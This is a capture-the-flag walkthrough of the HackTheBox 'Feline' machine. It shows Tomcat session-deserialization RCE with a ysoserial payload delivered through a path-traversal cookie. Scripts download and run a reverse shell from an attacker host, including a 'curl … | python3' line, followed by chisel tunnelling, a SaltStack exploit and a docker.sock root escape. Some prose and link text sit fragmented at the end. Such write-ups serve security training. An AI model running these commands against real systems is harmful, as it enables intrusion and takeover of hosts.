📕
HackTheBox - Linux
  • HackTheBox - Registry
  • HackTheBox - Scavenger
  • HackTheBox - Ellingson
  • HackTheBox - OneTwoSeven
  • HackTheBox - Player
  • HackTheBox - Zipper
  • HackTheBox - Dab
  • HackTheBox - Kotarak
  • HackTheBox - Ghoul
  • HackTheBox - Mango
  • HackTheBox - Feline
  • HackTheBox - Joker
  • HackTheBox - Unbalanced
  • HackTheBox - Compromised
  • HackTheBox - Obscurity
  • HackTheBox - Monitors
  • HackTheBox - Windows
Powered by GitBook
On this page
  • Rustscan results
  • Checking out the web server
  • Apache Tomcat RCE by deserialization
  • Creating Payload using ysoserial.jar
  • Getting Reverse shell
  • Scanning the docker0 interface using nmap (Host Discovery)
  • Port scanning on docker container
  • Forwarding ports using chisel
  • Saltstack 3000.1 - Remote Code Execution
  • Writable docker socket (docker.sock)
  • Mounting the root (host) into the container

Was this helpful?

HackTheBox - Feline

PreviousHackTheBox - MangoNextHackTheBox - Joker

Last updated 4 years ago

Was this helpful?

Rustscan results

I am gonna use rustscan today to scan all the ports. It is one of the most powerful tool used nowadays to scan the all the ports in no time. It is comparatively faster than nmap.

RustScan is a tool that turns a 17 minutes Nmap scan into 19 seconds. RustScan – Faster Nmap Scanning with Rust. some of the features with this tool are: Scans all 65k ports in 8 seconds (on 10k batch size). Saves you time by automatically piping it into Nmap

It then runs nmap scan on the discovered ports to identify the services and version number.

Apache Tomcat is running on 8080 with a version number of 9.0.27

Checking out the web server

We have a file upload functionality at /service/index.html. The website is about adding email attachments to scan for viruses.

If we try to mess with the upload feature, we get the following error.

Apache Tomcat RCE by deserialization

There are a number of prerequisites for this vulnerability to be exploitable.

  1. The PersistentManager is enabled and it’s using a FileStore

  2. The attacker is able to upload a file with arbitrary content, has control over the filename and knows the location where it is uploaded

  3. There are gadgets in the classpath that can be used for a Java deserialization attack

Creating Payload using ysoserial.jar

I will be using CommonsCollections2 payload to generate a Java serialized data. 

java -jar ysoserial.jar CommonsCollections2 'ping -c 3 10.10.14.5' > ping.session
// Uploading the session file
curl -X POST http://feline.htb:8080/upload.jsp -H "Cookie: JSESSIONID=../../../../../opt/samples/uploads/ping" -F 'image=@ping.session'
// Triggering the session
curl http://feline.htb:8080/upload.jsp -H "Cookie: JSESSIONID=../../../../../opt/samples/uploads/ping"

Getting Reverse shell

Now that we have code execution, let's get a reverse shell. We will need two payloads, one to download the shell file and another one to execute it.

java -jar ysoserial.jar CommonsCollections2 'curl http://10.10.14.5:8000/shell.py -o /tmp/shell.py' > reverse.session
java -jar ysoserial.jar CommonsCollections2 'python3 /tmp/shell.py' > execute.session
#!/bin/bash

echo "[+] Starting the exploit"
#Downloading the payload
curl -X POST http://feline.htb:8080/upload.jsp -H "Cookie: JSESSIONID=../../../../opt/samples/uploads/reverse" -F 'image=@reverse.session'
curl http://feline.htb:8080/upload.jsp -H "Cookie: JSESSIONID=../../../../opt/samples/uploads/reverse"

echo "[+] Wait 5 secs"
sleep 5

#Executing the payload
curl -X POST http://feline.htb:8080/upload.jsp -H "Cookie: JSESSIONID=../../../../opt/samples/uploads/execute" -F 'image=@execute.session'
curl http://feline.htb:8080/upload.jsp -H "Cookie: JSESSIONID=../../../../opt/samples/uploads/execute"

echo "[+] Completed"

Scanning the docker0 interface using nmap (Host Discovery)

We have docker0 interface running on the machine where we can search for more hosts. I will use static nmap binary to scan on that network. 

./nmap -sn 172.17.0.1-255

Port scanning on docker container

We get a new host having IP Address of 172.17.0.2 which is a docker container running some kind of service. I will also scan for ports on this IP. A simple bash script to scan all the ports.

#!/bin/bash

ip=$1

if [[ $# -eq 0 ]];then
        echo "[-] Supply IP Address"
        exit 0
fi

for i in `seq 1 65535`;do
        echo 1 > /dev/tcp/$ip/$i
        if [[ $? -eq 0 ]];then
                echo "[+] Port open: $i"
        fi
done

Forwarding ports using chisel

Firstly we need to forward all the ports using chisel. The ports that we are interested in are 4505 and 4506.

Our Local machine

./chisel server --reverse -p 9001

Victim's machine

./chisel client 10.10.14.5:9001 R:4505:172.17.0.2:4505 &
./chisel client 10.10.14.5:9001 R:4506:172.17.0.2:4506 &
./chisel client 10.10.14.5:9001 R:8001:172.17.0.2:8000 &

To check if it worked or not, we can use netstat command.

Saltstack 3000.1 - Remote Code Execution

A vulnerability, named CVE-2020-28243, was identified as a privilege escalation bug impacting SaltStack Salt minions. This allowed an unprivileged user to create files in any non-blacklisted directory via a command injection in a process name.

python3 exploit.py --exec "curl http://10.10.14.5:8000/shell.py | python3"

Writable docker socket (docker.sock)

As we have access to the docker.sock file, we can exploit it and probably get root access on host system. For that we need to understand all the docker endpoints on creating and managing containers.

Mounting the root (host) into the container

// Listing docker images: similar to docker images command
curl -X GET --unix-socket /var/run/docker.sock http://localhost/images/json

//Creating container: similar to docker run command
curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d '{"Image":"<ImageID>","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/","Target":"/mnt/root"}]}' http://localhost/containers/create

//Starting the container
curl -X POST --unix-socket /var/run/docker.sock http://localhost/containers/<NewContainerID>/start

// Using socat to connect
socat - UNIX-CONNECT:/var/run/docker.sock
POST /containers/<NewContainerID>/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
Host:
Connection: Upgrade
Upgrade: tcp

Keeping that in mind, let's proceed. We can search for tomcat vulnerabilities on CVE . After searching on MITRE and google, I found this . Read what the vulnerability is and how it was patched. We know the upload file location and also we can control the Cookie, that means we can exploit it.

Prerequisites (Taken from )

We need ysoserial.jar file to create a malicious file that we can upload to get RCE. Github repo is and the package can be downloaded from .

Saltstack runs on port 4505 and 4506 (salt-master). is a management software and remote execution engine widely used in devops field. Read more about it over .

Get the code for exploit from and as we already have 4505 and 4506 listening, we can run the script.

MITRE
vulnerability
here
here
here
Saltstack
here
here
https://docs.docker.com/engine/api/
https://docs.docker.com/engine/api/v1.40/
Linux Privilege EscalationHackTricks
Logo